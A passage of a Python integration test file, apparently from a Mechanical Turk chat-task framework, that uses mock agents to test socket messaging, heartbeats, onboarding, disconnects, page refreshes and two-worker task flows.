mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for worker in workers:
worker.id = MTURK_DUO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
world = TestDuoWorld(opt=opt, agents=workers)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except Exception:
raise
finally:
pass
def make_packet_handler_cant_task(agent, on_ack, on_hb, on_msg):
"""A packet handler that is unable to switch into task worlds"""
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if agent.always_beat:
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
if not agent.always_beat:
pass
elif not packet.data['conversation_id'].startswith('t_'):
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
else:
agent.always_beat = False
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def make_packet_handler(agent, on_ack, on_hb, on_msg):
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def check_status(input_status, desired_status):
assert input_status == desired_status, 'Expected to be in {}, was found ' \
'in {}'.format(desired_status, input_status)
def check_new_agent_setup(agent, mturk_manager,
status=AssignState.STATUS_ONBOARDING):
mturk_agent = mturk_manager.mturk_workers[agent.worker_id]
assert mturk_agent is not None, \
'MTurk manager did not make a worker state on alive'
mturk_assign = mturk_agent.agents[agent.assignment_id]
assert mturk_assign is not None, \
'MTurk manager did not make an assignment state on alive'
assert mturk_assign.state.status == status, \
'MTurk manager did not move the agent into {}, stuck in {}'.format(
status, mturk_assign.state.status
)
connection_id = mturk_assign.get_connection_id()
assert mturk_manager.socket_manager.socket_is_open(connection_id), \
'The socket manager didn\'t open a socket for this agent'
def test_sns_service(opt, server_url):
global completed_threads
print('{} Starting'.format(AMAZON_SNS_TEST))
task_name = AMAZON_SNS_TEST
task_group_id = AMAZON_SNS_TEST
messages = 0
def world_on_new_message(pkt):
nonlocal messages # noqa: E999 we don't support python2
messages += 1
socket_manager = SocketManager(
server_url,
PORT,
dummy,
world_on_new_message,
dummy,
task_group_id
)
# Wait for manager to spin up
last_time = time.time()
while not socket_manager.alive:
time.sleep(0.2)
assert time.time() - last_time < 10, \
'Timed out wating for socket_manager to spin up'
mturk_utils.setup_aws_credentials()
arn = mturk_utils.setup_sns_topic(task_name, server_url, task_group_id)
mturk_utils.send_test_notif(arn, 'AssignmentAbandoned')
mturk_utils.send_test_notif(arn, 'AssignmentReturned')
mturk_utils.send_test_notif(arn, 'AssignmentSubmitted')
last_time = time.time()
while messages != 3:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 30, \
'Timed out wating for amazon message'
mturk_utils.delete_sns_topic(arn)
completed_threads[AMAZON_SNS_TEST] = True
def test_socket_manager(opt, server_url):
global completed_threads
TEST_MESSAGE = 'This is a test'
task_group_id = TASK_GROUP_ID.format('TEST_SOCKET')
socket_manager = None
world_received_alive = False
world_received_message = False
agent_timed_out = False
def world_on_alive(pkt):
nonlocal world_received_alive
# Assert alive packets contain the right data
worker_id = pkt.data['worker_id']
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
hit_id = pkt.data['hit_id']
assert hit_id == HIT_1_ID, 'HIT id was {}'.format(hit_id)
assign_id = pkt.data['assignment_id']
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
conversation_id = pkt.data['conversation_id']
assert conversation_id is None, \
'Conversation id was {}'.format(conversation_id)
# Start a channel
socket_manager.open_channel(worker_id, assign_id)
# Note that alive was successful
world_received_alive = True
def world_on_new_message(pkt):
nonlocal world_received_message
text = pkt.data['text']
assert text == TEST_MESSAGE, 'Received text was {}'.format(text)
world_received_message = True
def world_on_socket_dead(worker_id, assign_id):
nonlocal agent_timed_out
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
agent_timed_out = True
return True
socket_manager = SocketManager(
server_url,
PORT,
world_on_alive,
world_on_new_message,
world_on_socket_dead,
task_group_id
)
agent_got_response_heartbeat = False
received_messages = 0
did_ack = False
agent = MockAgent(opt, HIT_1_ID, ASSIGN_1_ID, AGENT_1_ID, task_group_id)
connection_id = '{}_{}'.format(AGENT_1_ID, ASSIGN_1_ID)
def agent_on_message(pkt):
nonlocal agent_got_response_heartbeat
nonlocal received_messages
nonlocal agent
if pkt['type'] == Packet.TYPE_HEARTBEAT:
agent_got_response_heartbeat = True
elif pkt['type'] == Packet.TYPE_MESSAGE:
if received_messages != 0:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
received_messages += 1
elif pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
def manager_on_message_ack(pkt):
nonlocal did_ack
did_ack = True
agent.setup_socket(server_url, agent_on_message)
time.sleep(1)
# Wait for socket to open to begin testing
agent.wait_for_alive()
assert socket_manager.socket_is_open(connection_id), \
'Channel was not properly opened for connecting agent'
# send some content from the agent
time.sleep(1)
agent.send_heartbeat()
time.sleep(1)
agent.send_message(TEST_MESSAGE, None)
time.sleep(1)
# Send some content from the socket manager, don't ack the first
# time to ensure that resends work, and ensure the callback is
# eventually called
test_blocking_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
socket_manager.get_my_sender_id(),
AGENT_1_ID,
ASSIGN_1_ID,
'',
None,
True,
True,
manager_on_message_ack
)
# Send packet and wait for it to arrive the first time
socket_manager.queue_packet(test_blocking_packet)
# Wait for socket to open to begin testing
last_time = time.time()
while received_messages == 0:
time.sleep(0.5)
assert time.time() - last_time < 10, \
'Timed out wating for server to send message'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_SENT, \
'Packet sent but status never updated'
# wait for resend to occur
time.sleep(2.5)
assert did_ack, 'Socket_manager\'s message ack callback never fired'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_ACK, \
'Packet recieved but status never updated'
# Ensure queues are properly set up and that reopening an open socket
# does nothing
assert len(socket_manager.queues) == 1, \
'More queues were opened than expected for the connecting agent'
socket_manager.open_channel(AGENT_1_ID, ASSIGN_1_ID)
assert len(socket_manager.queues) == 1, \
'Second open for the worker was not idempotent'
time.sleep(8.5)
# Ensure all states happened and that the agent eventually disconnected
assert world_received_alive, 'World never received alive message'
assert world_received_message, 'World never received test message'
assert agent_timed_out, 'Agent did not timeout'
assert agent_got_response_heartbeat, 'Agent never got response heartbeat'
# Close channels and move on
socket_manager.close_all_channels()
assert not socket_manager.socket_is_open(connection_id), \
'Channel was not closed with close_all_channels'
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
assert len(socket_manager.queues) == 0, \
'Queues were not cleared on close, {} found'.format(
len(socket_manager.queues)
)
assert len(socket_manager.threads) == 0, \
'Threads were not cleared on close, {} found'.format(
len(socket_manager.threads)
)
# Test to make sure can't send a packet to a closed channel
test_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
AGENT_1_ID,
socket_manager.get_my_sender_id(),
ASSIGN_1_ID,
''
)
socket_manager.queue_packet(test_packet)
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
completed_threads[SOCKET_TEST] = True
def test_solo_with_onboarding(opt, server_url):
"""Tests solo task with onboarding to completion, as well as disconnect in
onboarding to ensure the agent is marked disconnected.
"""
global completed_threads
print('{} Starting'.format(SOLO_ONBOARDING_TEST))
opt['task'] = SOLO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 2)
worker_id = FAKE_WORKER_ID.format(SOLO_ONBOARDING_TEST, 1)
connection_id_1 = '{}_{}'.format(worker_id, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id, assign_id_2)
last_command = None
message_num = 0
expected_messages = [
TestOnboardWorld.TEST_TEXT_1, TestOnboardWorld.TEST_TEXT_2,
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_fail = \
MockAgent(opt, hit_id, assign_id_1, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_fail, dummy, dummy, msg_callback)
test_agent_fail.setup_socket(server_url, message_handler)
test_agent_fail.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_fail, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_1]
assign_state = mturk_manager_assign.state
# Run through onboarding, then disconnect and reconnect
test_agent_fail.always_beat = True
test_agent_fail.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent_fail.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent_fail.send_message('Hello1', dummy)
test_agent_fail.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
# Refresh the agent
test_agent_fail.conversation_id = None
test_agent_fail.send_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_INACTIVE_HIT, \
'Agent disconnected in onboarding didn\'t get inactive hit'
assert assign_state.status == AssignState.STATUS_DISCONNECT, \
'Disconnected agent not marked as so in state'
assert mturk_manager_assign.disconnected is True, \
'Disconnected agent not marked as so in agent'
# Connect with a new agent and finish onboarding
last_command = None
message_num = 0
test_agent = MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_ONBOARDING)
test_agent.send_message('Hello2', dummy)
wait_for_state_time(4, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
last_time = time.time()
while message_num == 2:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 10, \
'Timed out wating for server to acknowledge alive'
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello3', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert mturk_manager_assign.is_in_task(), 'Manager\'s copy of agent is ' \
'not aware that they are in a task, even though the state is'
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello4', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of ' \
'onboarding, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert message_num == 4, 'Not all messages were successfully processed'
completed_threads[SOLO_ONBOARDING_TEST] = True
def test_solo_no_onboarding(opt, server_url):
"""Ensures a solo agent with no onboarding moves directly to a task world
and is able to complete the task and be marked as completed
"""
global completed_threads
print('{} Starting'.format(SOLO_NO_ONBOARDING_TEST))
opt['task'] = SOLO_NO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_NO_ONBOARDING_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
wait_for_state_time(3, mturk_manager)
test_agent.always_beat = False
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[SOLO_NO_ONBOARDING_TEST] = True
def test_solo_refresh_in_middle(opt, server_url):
"""Tests refreshing in the middle of a solo task to make sure state is
properly restored
"""
global completed_threads
print('{} Starting'.format(SOLO_REFRESH_TEST))
opt['task'] = SOLO_REFRESH_TEST
hit_id = FAKE_HIT_ID.format(SOLO_REFRESH_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_REFRESH_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_REFRESH_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
# Simulate a refresh
test_agent.conversation_id = None
test_agent.send_alive()
last_time = time.time()
while (last_command.data['text'] != data_model.COMMAND_RESTORE_STATE):
# Wait for the restore state command
time.sleep(1)
assert time.time() - last_time < 10, \
'Timed out wating for COMMAND_RESTORE_STATE to arrive'
# Check that the restore state had what we expected
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it back to task world'
assert len(last_command.data['messages']) == 1, \
'State restored with more than the 1 message expected, got {}'.format(
len(last_command.data['messages'])
)
assert last_command.data['messages'][0]['text'] == expected_messages[0], \
'Message sent in restore state packet wasn\'t correct'
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 1'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
completed_threads[SOLO_REFRESH_TEST] = True
def test_duo_with_onboarding(opt, server_url):
"""Tests a solo task with onboarding to make sure the task doesn't begin
until both agents are ready to go. Also tests that a third agent is not
able to join after the conversation starts, as the HIT should be expired
"""
global completed_threads
print('{} Starting'.format(DUO_ONBOARDING_TEST))
opt['task'] = DUO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 2)
# Repeat worker_id on purpose to test is_sandbox matching of unique workers
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
last_command = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(4, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Attempt to connect with agent 3
assert not mturk_manager.accepting_workers, \
'Manager shouldn\'t still be accepting workers after a conv started'
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_ONBOARDING_TEST] = True
def test_duo_no_onboarding(opt, server_url):
"""Tests duo task to completion, as well as disconnect in
waiting to ensure the agent is marked disconnected and removed from pool.
It also tests disconnect in transitioning to a world to ensure the other
agent returns to waiting
"""
global completed_threads
print('{} Starting'.format(DUO_NO_ONBOARDING_TEST))
opt['task'] = DUO_NO_ONBOARDING_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(DUO_NO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
